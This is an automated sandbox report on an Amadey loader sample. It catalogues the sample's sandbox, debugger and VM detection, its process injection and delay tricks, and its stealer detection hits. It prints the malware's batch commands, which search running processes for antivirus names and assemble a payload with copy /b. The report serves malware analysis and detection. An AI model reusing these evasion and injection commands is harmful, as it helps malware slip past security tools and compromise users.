Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Code function: 22_2_00CFDBB8 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 22_2_00CFDBB8
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: dialer.exe, 00000010.00000002.2280612500.0000000002F70000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: MP.EXEX64DBG.EXEX32DBG.E
Source: dialer.exe, 00000010.00000002.2280612500.0000000002F70000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: X64DBG.EXE
Source: dialer.exe, 00000010.00000002.2280612500.0000000002F70000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: FIDDLER.EXE
Source: dialer.exe, 00000010.00000002.2280612500.0000000002F70000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: EVERYWHERE.EXEFIDDLER.EXEIDA.EXEIDA64.EXEIMMU""X
Uses ping.exe to sleep
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1 Jump to behavior
Contains functionality to detect virtual machines (STR)
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B636ABBE str word ptr [ebp+ecx*4+05h] 20_3_00007DF4B636ABBE
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Thread delayed: delay time: 180000
Found large amount of non-executed APIs
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe API coverage: 4.3 %
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe API coverage: 1.3 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe TID: 5888 Thread sleep time: -3000000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe TID: 2792 Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe TID: 2140 Thread sleep time: -360000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe TID: 5888 Thread sleep time: -30000s >= -30000s
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\SysWOW64\dialer.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\dialer.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Code function: 0_2_00406873 FindFirstFileW,FindClose, 0_2_00406873
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Code function: 0_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405C49
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Code function: 0_2_0040290B FindFirstFileW, 0_2_0040290B
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B6388E20 GetLogicalDriveStringsW, 20_3_00007DF4B6388E20
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B63E7344 GetSystemInfo, 20_3_00007DF4B63E7344
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Thread delayed: delay time: 30000
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Microsoft\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Microsoft\Windows\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\ Jump to behavior
Source: dialer.exe, 00000010.00000002.2280661154.0000000004720000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: HGfS09
Source: J2NWKU2oJi.exe, 00000000.00000002.1772749377.00000000007D8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: od_VMware_SATA_CD00#4&224f42ef&0&000
Source: dialer.exe, 00000010.00000002.2280361925.0000000002D28000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWX
Source: OpenWith.exe, 00000014.00000003.2378242743.000001BD776C1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}SymbolicLinkmbolicLinkSymbolicLink
Source: OpenWith.exe, 00000014.00000002.2583923900.000001BD776AF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}SyT
Source: Yuem.exe, 00000016.00000003.2535201056.0000000000FDA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: OpenWith.exe, 00000014.00000003.2378242743.000001BD776C1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}SymbolicLinkLinkcLinkSymbolicLink
Source: Dctooux.exe, 00000017.00000002.2949713341.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWP
Source: OpenWith.exe, 00000014.00000003.2377146496.000001BD776A2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}SymbolicLinkymbolicLinkcLinkSymbolicLink`
Source: dialer.exe, 00000010.00000003.2204492653.0000000004E60000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: DisableGuestVmNetworkConnectivity
Source: OpenWith.exe, 00000014.00000003.2330137003.000001BD7776A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMCIDevSymbol
Source: dialer.exe, 00000010.00000002.2280361925.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000002.2583277853.000001BD75908000.00000004.00000020.00020000.00000000.sdmp, Dctooux.exe, 00000017.00000002.2949713341.0000000000D77000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: dialer.exe, 00000010.00000003.2204492653.0000000004E60000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: EnableGuestVmNetworkConnectivity
Source: dialer.exe, 00000010.00000002.2280361925.0000000002D28000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWMaxClockSpeed
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif Process information queried: ProcessInformation Jump to behavior
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Code function: 22_2_00CFF00A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 22_2_00CFF00A
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Code function: 22_2_00D0D3E9 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 22_2_00D0D3E9
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\dialer.exe Code function: 16_3_027E027F mov eax, dword ptr fs:[00000030h] 16_3_027E027F
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Code function: 22_2_00D1B6E2 mov eax, dword ptr fs:[00000030h] 22_2_00D1B6E2
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Code function: 22_2_00D1797B mov eax, dword ptr fs:[00000030h] 22_2_00D1797B
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 23_2_00A8B6E2 mov eax, dword ptr fs:[00000030h] 23_2_00A8B6E2
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 23_2_00A8797B mov eax, dword ptr fs:[00000030h] 23_2_00A8797B
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 24_2_00A8B6E2 mov eax, dword ptr fs:[00000030h] 24_2_00A8B6E2
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 24_2_00A8797B mov eax, dword ptr fs:[00000030h] 24_2_00A8797B
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Code function: 22_2_00D20243 GetProcessHeap, 22_2_00D20243
Enables debug privileges
Source: C:\Windows\SysWOW64\tasklist.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Code function: 20_2_000001BD75701A90 NtAcceptConnectPort,NtAcceptConnectPort,RtlAddVectoredExceptionHandler, 20_2_000001BD75701A90
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Code function: 22_2_00CFE63C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 22_2_00CFE63C
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Code function: 22_2_00CFF00A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 22_2_00CFF00A
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Code function: 22_2_00CFF16F SetUnhandledExceptionFilter, 22_2_00CFF16F
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Code function: 22_2_00D17EFE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 22_2_00D17EFE
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 23_2_00A6E63C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 23_2_00A6E63C
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 23_2_00A6F00A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 23_2_00A6F00A
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 23_2_00A6F16F SetUnhandledExceptionFilter, 23_2_00A6F16F
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 23_2_00A87EFE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 23_2_00A87EFE
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 24_2_00A6F00A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 24_2_00A6F00A
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 24_2_00A6F16F SetUnhandledExceptionFilter, 24_2_00A6F16F
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 24_2_00A6E63C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 24_2_00A6E63C
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 24_2_00A87EFE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 24_2_00A87EFE

HIPS / PFW / Operating System Protection Evasion
barindex
Contains functionality to inject code into remote processes
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Code function: 22_2_00CE74F0 GetModuleFileNameA,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree, 22_2_00CE74F0
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c move Scenes Scenes.bat && Scenes.bat Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 331463 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "AdditionUnitKoreanLn" Remembered Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Pitch + Twelve + Conditions + Venture + Pushing 331463\Q Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif 331463\Pleasure.pif 331463\Q Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1 Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif Process created: C:\Windows\SysWOW64\dialer.exe "C:\Windows\system32\dialer.exe" Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Process created: C:\Windows\System32\OpenWith.exe "C:\Windows\system32\openwith.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Process created: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe "C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe" Jump to behavior
Source: Pleasure.pif, 0000000A.00000000.1724748135.0000000000206000.00000002.00000001.01000000.00000006.sdmp, Cocks.0.dr, Pleasure.pif.1.dr Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Code function: 22_2_00CFF1F6 cpuid 22_2_00CFF1F6
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Windows\System32\OpenWith.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\OpenWith.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B637F83C CreateNamedPipeW,BindIoCompletionCallback,ConnectNamedPipe, 20_3_00007DF4B637F83C
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Code function: 22_2_00CEB385 CoInitialize,CoCreateInstance,CoUninitialize,CoUninitialize,CoUninitialize,GetLocalTime,CoUninitialize,CoInitialize,CoCreateInstance,CoUninitialize, 22_2_00CEB385
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Code function: 22_2_00CEB2B0 GetUserNameA, 22_2_00CEB2B0
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Code function: 22_2_00D23B1A _free,GetTimeZoneInformation, 22_2_00D23B1A
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Code function: 0_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_0040352D
Source: C:\Windows\System32\OpenWith.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected Amadey
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Yara detected Amadeys stealer DLL
Source: Yara match File source: 20.3.OpenWith.exe.1bd77981c18.19.raw.unpack, type: UNPACKEDPE
